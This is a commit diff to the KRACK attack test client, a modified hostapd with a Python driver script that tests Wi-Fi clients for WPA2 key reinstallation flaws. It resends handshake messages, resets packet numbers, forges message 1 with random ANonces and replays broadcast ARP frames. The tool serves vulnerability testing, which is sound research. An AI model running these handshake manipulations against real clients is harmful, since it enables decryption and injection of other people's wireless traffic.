Browse Source

krackattacks: use new testing commands of hostap

Mathy Vanhoef 7 years ago
parent
commit
5693f4b15f

+ 21 - 6
hostapd/ctrl_iface.c

@@ -2012,7 +2012,11 @@ static int hostapd_ctrl_reset_pn(struct hostapd_data *hapd, const char *cmd)
 		if (hapd->last_gtk_alg == WPA_ALG_NONE)
 			return -1;
 
+#ifdef KRACK_TEST_CLIENT
+		poc_log(NULL, "Reset PN for GTK\n");
+#else
 		wpa_printf(MSG_INFO, "TESTING: Reset PN for GTK");
+#endif
 
 		/* First, use a zero key to avoid any possible duplicate key
 		 * avoidance in the driver. */
@@ -2038,8 +2042,12 @@ static int hostapd_ctrl_reset_pn(struct hostapd_data *hapd, const char *cmd)
 	if (sta->last_tk_alg == WPA_ALG_NONE)
 		return -1;
 
+#ifdef KRACK_TEST_CLIENT
+	poc_log(sta->addr, "Reset PN\n");
+#else
 	wpa_printf(MSG_INFO, "TESTING: Reset PN for " MACSTR,
 		   MAC2STR(sta->addr));
+#endif
 
 	/* First, use a zero key to avoid any possible duplicate key avoidance
 	 * in the driver. */
@@ -2142,7 +2150,12 @@ static int hostapd_ctrl_resend_m1(struct hostapd_data *hapd, const char *cmd)
 				    NULL, 0);
 	}
 
+#ifdef KRACK_TEST_CLIENT
+	poc_log(sta->addr, "sending a new 4-way message 1 (%s)\n",
+		os_strstr(cmd, "change-anonce") != NULL ? "with random ANonce" : "with same ANonce");
+#else
 	wpa_printf(MSG_INFO, "TESTING: Send M1 to " MACSTR, MAC2STR(sta->addr));
+#endif
 	return wpa_auth_resend_m1(sta->wpa_sm,
 				  os_strstr(cmd, "change-anonce") != NULL,
 				  plain ? restore_tk : NULL, hapd, sta);
@@ -2172,7 +2185,11 @@ static int hostapd_ctrl_resend_m3(struct hostapd_data *hapd, const char *cmd)
 				    NULL, 0);
 	}
 
+#ifdef KRACK_TEST_CLIENT
+	poc_log(sta->addr, "sending a new 4-way message 3\n");
+#else
 	wpa_printf(MSG_INFO, "TESTING: Send M3 to " MACSTR, MAC2STR(sta->addr));
+#endif
 	return wpa_auth_resend_m3(sta->wpa_sm,
 				  plain ? restore_tk : NULL, hapd, sta);
 }
@@ -2202,9 +2219,13 @@ static int hostapd_ctrl_resend_group_m1(struct hostapd_data *hapd,
 				    NULL, 0);
 	}
 
+#ifdef KRACK_TEST_CLIENT
+	poc_log(sta->addr, "Send group M1 for the same GTK and zero RSC\n");
+#else
 	wpa_printf(MSG_INFO,
 		   "TESTING: Send group M1 for the same GTK and zero RSC to "
 		   MACSTR, MAC2STR(sta->addr));
+#endif
 	return wpa_auth_resend_group_m1(sta->wpa_sm,
 					plain ? restore_tk : NULL, hapd, sta);
 }
@@ -3102,12 +3123,6 @@ static int hostapd_ctrl_iface_receive_process(struct hostapd_data *hapd,
 		reply_len = hostapd_ctrl_driver_flags(hapd->iface, reply,
 						      reply_size);
 #ifdef KRACK_TEST_CLIENT
-	} else if (os_strcmp(buf, "TEST_TPTK") == 0) {
-		poc_test_tptk_construction(hapd->wpa_auth, TEST_TPTK_REPLAY);
-	} else if (os_strcmp(buf, "TEST_TPTK_RAND") == 0) {
-		poc_test_tptk_construction(hapd->wpa_auth, TEST_TPTK_RAND);
-	} else if (os_strcmp(buf, "START_GROUP_TESTS") == 0) {
-		poc_start_testing_group_handshake(hapd->wpa_auth);
 	} else if (os_strncmp(buf, "GET_TK ", 7) == 0) {
 		reply_len = hostapd_get_tk(hapd, buf + 7, reply, reply_size);
 #endif

+ 1 - 1
hostapd/defconfig

@@ -318,7 +318,7 @@ CONFIG_IPV6=y
 # connect to this hostapd. These options allow, for example, to drop a
 # certain percentage of probe requests or auth/(re)assoc frames.
 #
-#CONFIG_TESTING_OPTIONS=y
+CONFIG_TESTING_OPTIONS=y
 
 # Automatic Channel Selection
 # This will allow hostapd to pick the channel automatically when channel is set

+ 2 - 2
hostapd/hostapd.conf

@@ -5,7 +5,7 @@
 # management frames with the Host AP driver); wlan0 with many nl80211 drivers
 # Note: This attribute can be overridden by the values supplied with the '-i'
 # command line parameter.
-interface=wlan0
+interface=wlp0s20u2
 
 # In case of atheros and nl80211 driver interfaces, an additional
 # configuration parameter, bridge, may be used to notify hostapd if the
@@ -1305,7 +1305,7 @@ rsn_pairwise=CCMP
 # This defaults to 86400 seconds (once per day) when using CCMP/GCMP as the
 # group cipher and 600 seconds (once per 10 minutes) when using TKIP as the
 # group cipher.
-#wpa_group_rekey=86400
+wpa_group_rekey=8640000
 
 # Rekey GTK when any STA that possesses the current GTK is leaving the BSS.
 # (dot11RSNAConfigGroupRekeyStrict)

+ 23 - 15
krackattack/krack-test-client.py

@@ -180,7 +180,7 @@ class ClientState():
 		self.groupkey_prev_canary_time = p.time
 
 	def groupkey_track_request(self):
-		"""Track when we went broadcast ARP requests, and determine if a client seems patched"""
+		"""Track when we send broadcast ARP requests, and determine if a client seems patched"""
 
 		if self.vuln_group != ClientState.UNKNOWN: return
 		hstype = "group key" if self.groupkey_grouphs else "4-way"
@@ -358,6 +358,7 @@ class KRAckAttackClient():
 
 	def run(self, test_grouphs=False, test_tptk=False):
 		self.configure_interfaces()
+		self.test_tptk = test_tptk
 
 		# Open the patched hostapd instance that carries out tests and let it start
 		log(STATUS, "Starting hostapd ...")
@@ -397,18 +398,6 @@ class KRAckAttackClient():
 		self.group_ip = self.dhcp.pool.pop()
 		self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
 
-		# If applicable, inform hostapd that we are testing the group key handshake
-		if test_grouphs:
-			hostapd_command(self.hostapd_ctrl, "START_GROUP_TESTS")
-			self.test_grouphs = True
-
-		# If applicable, inform hostapd that we are testing for Temporal PTK (TPTK) construction behaviour
-		self.test_tptk = test_tptk
-		if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
-			hostapd_command(self.hostapd_ctrl, "TEST_TPTK")
-		elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
-			hostapd_command(self.hostapd_ctrl, "TEST_TPTK_RAND")
-
 		log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
 
 		# Monitor both the normal interface and virtual monitor interface of the AP
@@ -420,14 +409,33 @@ class KRAckAttackClient():
 
 			# Periodically send the replayed broadcast ARP requests to test for group key reinstallations
 			if time.time() > self.next_arp:
+				hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")
+
 				self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
 				for client in self.clients.values():
-					# Also keep injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
+					# 1. Test the 4-way handshake. We rely on an encrypted message 4 as reply to detect pairwise
+					#    key reinstallations reinstallations.
+					if not self.test_grouphs and client.vuln_4way != ClientState.VULNERABLE:
+						# First inject a message 1 if requested using the TPTK option
+						if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
+							hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
+						elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
+							hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
+
+						hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac)
+
+					# 2. Test reinstallation of the group key (in both the 4-way and group key handshake). Keep
+					#    injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
 					if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
+						if self.test_grouphs:
+							hostapd_command(self.hostapd_ctrl, "RESEND_GROUP_M1 " + client.mac)
+
 						clientip = self.dhcp.leases[client.mac]
 						client.groupkey_track_request()
-						log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
 
+						time.sleep(0.1)
+
+						log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
 						request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
 						self.sock_eth.send(request)
 

+ 41 - 128
src/ap/wpa_auth.c

@@ -65,14 +65,8 @@ static void wpa_group_put(struct wpa_authenticator *wpa_auth,
 			  struct wpa_group *group);
 static u8 * ieee80211w_kde_add(struct wpa_state_machine *sm, u8 *pos);
 
-#ifdef KRACK_TEST_CLIENT
-#define HANDSHAKE_TRANSMIT_INTERVAL 2
-static const u32 eapol_key_timeout_first = HANDSHAKE_TRANSMIT_INTERVAL * 1000; /* ms */
-static const u32 eapol_key_timeout_subseq = HANDSHAKE_TRANSMIT_INTERVAL * 1000; /* ms */
-#else
 static const u32 eapol_key_timeout_first = 100; /* ms */
 static const u32 eapol_key_timeout_subseq = 1000; /* ms */
-#endif
 static const u32 eapol_key_timeout_first_group = 500; /* ms */
 static const u32 eapol_key_timeout_no_retrans = 4000; /* ms */
 
@@ -81,14 +75,6 @@ static const int dot11RSNAConfigPMKLifetime = 43200;
 static const int dot11RSNAConfigPMKReauthThreshold = 70;
 static const int dot11RSNAConfigSATimeout = 60;
 
-#ifdef KRACK_TEST_CLIENT
-/* globals to control the handshake being tested */
-#define TEST_4WAY	1
-#define TEST_GROUP	2
-int poc_testing_handshake = TEST_4WAY;
-int poc_testing_tptk_construction = TEST_TPTK_NONE;
-#endif
-
 static inline int wpa_auth_mic_failure_report(
 	struct wpa_authenticator *wpa_auth, const u8 *addr)
 {
@@ -188,7 +174,7 @@ static inline int wpa_auth_start_ampe(struct wpa_authenticator *wpa_auth,
 #endif /* CONFIG_MESH */
 
 #ifdef KRACK_TEST_CLIENT
-static void poc_log(const u8 *clientmac, const char *format, ...)
+void poc_log(const u8 *clientmac, const char *format, ...)
 {
 	time_t rawtime;
 	struct tm *timeinfo;
@@ -324,25 +310,6 @@ static void wpa_rekey_gtk(void *eloop_ctx, void *timeout_ctx)
 	}
 }
 
-#ifdef KRACK_TEST_CLIENT
-void poc_start_testing_group_handshake(struct wpa_authenticator *wpa_auth)
-{
-	// Start to periodically execute the group key handshake every 2 seconds
-	wpa_auth->conf.wpa_group_rekey = HANDSHAKE_TRANSMIT_INTERVAL;
-	eloop_cancel_timeout(wpa_rekey_gtk, wpa_auth, NULL);
-	eloop_register_timeout(wpa_auth->conf.wpa_group_rekey,
-			       0, wpa_rekey_gtk, wpa_auth, NULL);
-
-	poc_testing_handshake = TEST_GROUP;
-	poc_log(NULL, "starting group key handshake tests\n");
-}
-
-void poc_test_tptk_construction(struct wpa_authenticator *wpa_auth, int test_type)
-{
-	poc_testing_tptk_construction = test_type;
-}
-#endif
-
 
 static void wpa_rekey_ptk(void *eloop_ctx, void *timeout_ctx)
 {
@@ -472,11 +439,6 @@ struct wpa_authenticator * wpa_init(const u8 *addr,
 	wpa_auth->cb = cb;
 	wpa_auth->cb_ctx = cb_ctx;
 
-#ifdef KRACK_TEST_CLIENT
-	wpa_auth->conf.wpa_pairwise_update_count = 4000;
-	wpa_auth->conf.wpa_group_update_count = 4000;
-#endif
-
 	if (wpa_auth_gen_wpa_ie(wpa_auth)) {
 		wpa_printf(MSG_ERROR, "Could not generate WPA IE.");
 		os_free(wpa_auth);
@@ -1046,20 +1008,6 @@ void wpa_receive(struct wpa_authenticator *wpa_auth,
 		    key_data_length == AES_BLOCK_SIZE)) {
 		msg = PAIRWISE_4;
 		msgtxt = "4/4 Pairwise";
-
-#ifdef KRACK_TEST_CLIENT
-		if (poc_testing_handshake == TEST_4WAY)
-		{
-			// Still mark connection as complete, so we do receive and accept encrypted data
-			if (sm->keycount <= 0) {
-				wpa_auth_set_eapol(sm->wpa_auth, sm->addr, WPA_EAPOL_authorized, 1);
-				sm->keycount = 1;
-			}
-
-			//poc_log(sm->addr, "Ignoring Msg4/4\n");
-			return;
-		}
-#endif
 	} else {
 		msg = PAIRWISE_2;
 		msgtxt = "2/4 Pairwise";
@@ -1225,10 +1173,14 @@ continue_processing:
 	case PAIRWISE_4:
 		if (sm->wpa_ptk_state != WPA_PTK_PTKINITNEGOTIATING ||
 		    !sm->PTK_valid) {
+#ifdef KRACK_TEST_CLIENT
+			poc_log(sm->addr, "received a new message 4\n");
+#else
 			wpa_auth_vlogger(wpa_auth, sm->addr, LOGGER_INFO,
 					 "received EAPOL-Key msg 4/4 in "
 					 "invalid state (%d) - dropped",
 					 sm->wpa_ptk_state);
+#endif
 			return;
 		}
 		break;
@@ -2964,50 +2916,6 @@ SM_STATE(WPA_PTK, PTKINITNEGOTIATING)
 		return;
 	}
 
-#ifdef KRACK_TEST_CLIENT
-	if (poc_testing_handshake == TEST_4WAY && sm->TimeoutCtr > 1 && !sm->pairwise_set) {
-		poc_log(sm->addr, "already installing pairwise key\n");
-		enum wpa_alg alg = wpa_cipher_to_alg(sm->pairwise);
-		int klen = wpa_cipher_key_len(sm->pairwise);
-		if (wpa_auth_set_key(sm->wpa_auth, 0, alg, sm->addr, 0,
-				     sm->PTK.tk, klen)) {
-			wpa_sta_disconnect(sm->wpa_auth, sm->addr, WLAN_REASON_PREV_AUTH_NOT_VALID);
-			return;
-		}
-		sm->pairwise_set = TRUE;
-	}
-
-	// When testing for Temporal TPK construction (e.g. wpa_supplicant 2.6 attack), forge a message 1
-	// with the current and a random ANonce before retransmitted message 3's.
-	if (sm->TimeoutCtr > 1 && poc_testing_tptk_construction != TEST_TPTK_NONE) {
-		u8 replay_counter[WPA_REPLAY_COUNTER_LEN];
-		u8 random_anonce[WPA_NONCE_LEN];
-		u8 *anonce = NULL;
-
-		memcpy(replay_counter, sm->key_replay[0].counter, WPA_REPLAY_COUNTER_LEN);
-		random_get_bytes(random_anonce, WPA_NONCE_LEN);
-
-		// Note: this message 1 is sent using link-layer encryption. This is what we want.
-		// In practice an implementation may accept plaintext message 1's due to race conditions,
-		// were we just send it encrypted so we simulate always winning these race conditions.
-		poc_log(sm->addr, "Injecting Msg1 (%s) before Msg3 to test TPTK construction attack\n",
-			poc_testing_tptk_construction == TEST_TPTK_RAND ? "with random ANonce" : "with same ANonce");
-
-		anonce = poc_testing_tptk_construction == TEST_TPTK_RAND ? random_anonce : sm->ANonce;
-		__wpa_send_eapol(sm->wpa_auth, sm,
-			 WPA_KEY_INFO_ACK | WPA_KEY_INFO_KEY_TYPE, NULL,
-			 anonce, NULL, 0, 0, 0, 0);
-
-		// The replay counter should not be modified when sending the forged Msg1
-		memcpy(sm->key_replay[0].counter, replay_counter, WPA_REPLAY_COUNTER_LEN);
-	}
-
-	// Reset transmit packet number of the group key used by the kernel/driver, so
-	// we can detect if clients will accept re-used packet numbers (IVs) in broadcast
-	// data frames. Debug output is printed below.
-	wpa_group_config_group_keys(sm->wpa_auth, sm->group);
-#endif
-
 	/* Send EAPOL(1, 1, 1, Pair, P, RSC, ANonce, MIC(PTK), RSNIE, [MDIE],
 	   GTK[GN], IGTK, [FTIE], [TIE * 2])
 	 */
@@ -3165,13 +3073,6 @@ SM_STATE(WPA_PTK, PTKINITNEGOTIATING)
 	}
 #endif /* CONFIG_P2P */
 
-#ifdef KRACK_TEST_CLIENT
-	// Note: this was done in the beginning of the function, but we want the
-	//       output only to occur at this point.
-	if (poc_testing_handshake == TEST_4WAY)
-		poc_log(sm->addr, "Resetting Tx IV of group key and sending Msg3/4\n");
-#endif
-
 	wpa_send_eapol(sm->wpa_auth, sm,
 		       (secure ? WPA_KEY_INFO_SECURE : 0) |
 		       (wpa_mic_len(sm->wpa_key_mgmt, sm->pmk_len) ?
@@ -3523,20 +3424,13 @@ static int wpa_gtk_update(struct wpa_authenticator *wpa_auth,
 {
 	int ret = 0;
 
-#ifdef KRACK_TEST_CLIENT
-	if (poc_testing_handshake == TEST_GROUP) {
-		//printf(">>> Reusing previous GTK as new GTK: %02X %02X %02X %02X ..\n", group->GTK[group->GN - 1][0],
-		//	group->GTK[group->GN - 1][1], group->GTK[group->GN - 1][2], group->GTK[group->GN - 1][3]);
-	} else
-#endif
-	{
-		os_memcpy(group->GNonce, group->Counter, WPA_NONCE_LEN);
-		inc_byte_array(group->Counter, WPA_NONCE_LEN);
-		if (wpa_gmk_to_gtk(group->GMK, "Group key expansion",
-				   wpa_auth->addr, group->GNonce,
-				   group->GTK[group->GN - 1], group->GTK_len) < 0)
-			ret = -1;
-	}
+	os_memcpy(group->GNonce, group->Counter, WPA_NONCE_LEN);
+	inc_byte_array(group->Counter, WPA_NONCE_LEN);
+	if (wpa_gmk_to_gtk(group->GMK, "Group key expansion",
+			   wpa_auth->addr, group->GNonce,
+			   group->GTK[group->GN - 1], group->GTK_len) < 0)
+		ret = -1;
+
 	wpa_hexdump_key(MSG_DEBUG, "GTK",
 			group->GTK[group->GN - 1], group->GTK_len);
 
@@ -3706,16 +3600,9 @@ static void wpa_group_setkeys(struct wpa_authenticator *wpa_auth,
 	group->changed = TRUE;
 	group->wpa_group_state = WPA_GROUP_SETKEYS;
 	group->GTKReKey = FALSE;
-#ifdef KRACK_TEST_CLIENT
-	if (poc_testing_handshake == TEST_GROUP) {
-		//printf(">>> %s: not chaning keyidx of new group key\n", __FUNCTION__);
-	} else
-#endif
-	{
-		tmp = group->GM;
-		group->GM = group->GN;
-		group->GN = tmp;
-	}
+	tmp = group->GM;
+	group->GM = group->GN;
+	group->GN = tmp;
 #ifdef CONFIG_IEEE80211W
 	tmp = group->GM_igtk;
 	group->GM_igtk = group->GN_igtk;
@@ -4713,9 +4600,15 @@ int wpa_auth_resend_m1(struct wpa_state_machine *sm, int change_anonce,
 
 	wpa_auth_logger(sm->wpa_auth, sm->addr, LOGGER_DEBUG,
 			"sending 1/4 msg of 4-Way Handshake (TESTING)");
+#ifdef KRACK_TEST_CLIENT
+	__wpa_send_eapol(sm->wpa_auth, sm,
+		       WPA_KEY_INFO_ACK | WPA_KEY_INFO_KEY_TYPE, NULL,
+		       anonce, NULL, 0, 0, 0, 0);
+#else
 	wpa_send_eapol(sm->wpa_auth, sm,
 		       WPA_KEY_INFO_ACK | WPA_KEY_INFO_KEY_TYPE, NULL,
 		       anonce, NULL, 0, 0, 0);
+#endif
 	return 0;
 }
 
@@ -4875,6 +4768,15 @@ int wpa_auth_resend_m3(struct wpa_state_machine *sm,
 	}
 #endif /* CONFIG_IEEE80211R_AP */
 
+#ifdef KRACK_TEST_CLIENT
+	__wpa_send_eapol(sm->wpa_auth, sm,
+		       (secure ? WPA_KEY_INFO_SECURE : 0) |
+		       (wpa_mic_len(sm->wpa_key_mgmt, sm->pmk_len) ?
+			WPA_KEY_INFO_MIC : 0) |
+		       WPA_KEY_INFO_ACK | WPA_KEY_INFO_INSTALL |
+		       WPA_KEY_INFO_KEY_TYPE,
+		       _rsc, sm->ANonce, kde, pos - kde, keyidx, encr, 0);
+#else
 	wpa_send_eapol(sm->wpa_auth, sm,
 		       (secure ? WPA_KEY_INFO_SECURE : 0) |
 		       (wpa_mic_len(sm->wpa_key_mgmt, sm->pmk_len) ?
@@ -4882,6 +4784,7 @@ int wpa_auth_resend_m3(struct wpa_state_machine *sm,
 		       WPA_KEY_INFO_ACK | WPA_KEY_INFO_INSTALL |
 		       WPA_KEY_INFO_KEY_TYPE,
 		       _rsc, sm->ANonce, kde, pos - kde, keyidx, encr);
+#endif
 	os_free(kde);
 	return 0;
 }
@@ -4938,6 +4841,15 @@ int wpa_auth_resend_group_m1(struct wpa_state_machine *sm,
 	sm->eapol_status_cb_ctx1 = ctx1;
 	sm->eapol_status_cb_ctx2 = ctx2;
 
+#ifdef KRACK_TEST_CLIENT
+	__wpa_send_eapol(sm->wpa_auth, sm,
+		       WPA_KEY_INFO_SECURE |
+		       (wpa_mic_len(sm->wpa_key_mgmt, sm->pmk_len) ?
+			WPA_KEY_INFO_MIC : 0) |
+		       WPA_KEY_INFO_ACK |
+		       (!sm->Pair ? WPA_KEY_INFO_INSTALL : 0),
+		       rsc, NULL, kde, kde_len, gsm->GN, 1, 0);
+#else
 	wpa_send_eapol(sm->wpa_auth, sm,
 		       WPA_KEY_INFO_SECURE |
 		       (wpa_mic_len(sm->wpa_key_mgmt, sm->pmk_len) ?
@@ -4945,6 +4857,7 @@ int wpa_auth_resend_group_m1(struct wpa_state_machine *sm,
 		       WPA_KEY_INFO_ACK |
 		       (!sm->Pair ? WPA_KEY_INFO_INSTALL : 0),
 		       rsc, NULL, kde, kde_len, gsm->GN, 1);
+#endif
 
 	os_free(kde_buf);
 	return 0;

+ 2 - 0
src/common/attacks.h

@@ -12,4 +12,6 @@
 // against the client.
 #define KRACK_TEST_CLIENT
 
+void poc_log(const u8 *clientmac, const char *format, ...);
+
 #endif // ATTACKS_H_

+ 0 - 7
src/drivers/driver_nl80211.c

@@ -2867,13 +2867,6 @@ static int wpa_driver_nl80211_set_key(const char *ifname, struct i802_bss *bss,
 	if (drv->nlmode == NL80211_IFTYPE_P2P_DEVICE)
 		return 0;
 
-#ifdef KRACK_TEST_CLIENT
-	// Delete the key first to so that in patched kernels (that ignore key reinstallations), this still causes
-	// the associated transmit counter to be reset (required when testing group key reinstallations).
-	if (alg != WPA_ALG_NONE)
-		wpa_driver_nl80211_set_key(ifname, bss, WPA_ALG_NONE, addr, key_idx, set_tx, seq, seq_len, key, key_len);
-#endif // KRACK_TEST_CLIENT
-
 	ifindex = if_nametoindex(ifname);
 	wpa_printf(MSG_DEBUG, "%s: ifindex=%d (%s) alg=%d addr=%p key_idx=%d "
 		   "set_tx=%d seq_len=%lu key_len=%lu",